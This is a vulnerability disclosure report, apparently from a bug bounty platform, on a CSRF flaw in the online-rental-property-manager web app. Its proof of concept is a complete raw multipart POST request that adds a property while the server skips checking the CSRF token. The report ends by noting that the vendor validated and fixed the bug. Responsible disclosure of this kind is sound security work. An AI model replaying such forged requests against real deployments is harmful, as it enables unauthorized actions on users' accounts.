Cross-Site Request Forgery (CSRF) in bigprof-software/online-rental-property-manager

Valid

Reported on

Aug 4th 2021


✍️ Description

CSRF bug to add property

🕵️‍♂️ Proof of Concept

Bellow request is vulnerable to csrf attack .
Although there is csrf token in request but it does not checked in server-side . Any attacker provided csrf token is accepted here.

POST /online-rental/app/properties_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------38437840593695382254572995149
Content-Length: 2917
Origin: http://localhost
Connection: close
Referer: http://localhost/online-rental/app/properties_view.php?filterer_owner=1&addNew_x=1&Embedded=1
Cookie: 
Upgrade-Insecure-Requests: 1
Account: test2

-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="Embedded"

1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="csrf_token"

41c0d66e879e60346c9223ebedcd003a
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="filterer_owner"

1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="current_view"

DV
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SortField"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SelectedID"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SelectedField"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SortDirection"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="FirstRecord"

1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="NoDV"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="PrintDV"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="DisplayRecords"

all
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="property_name"

property1_by_user
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="type"

Residential
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="number_of_units"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="owner"

1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="country"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="street"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="City"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="State"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="ZIP"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="insert_x"

1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SearchString"


-----------------------------38437840593695382254572995149--

💥 Impact

csrf bug

We have contacted a member of the bigprof-software/online-rental-property-manager team and are waiting to hear back 4 months ago
BigProf Software validated this vulnerability 3 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
BigProf Software confirmed that a fix has been merged on f45953 3 months ago
BigProf Software has been awarded the fix bounty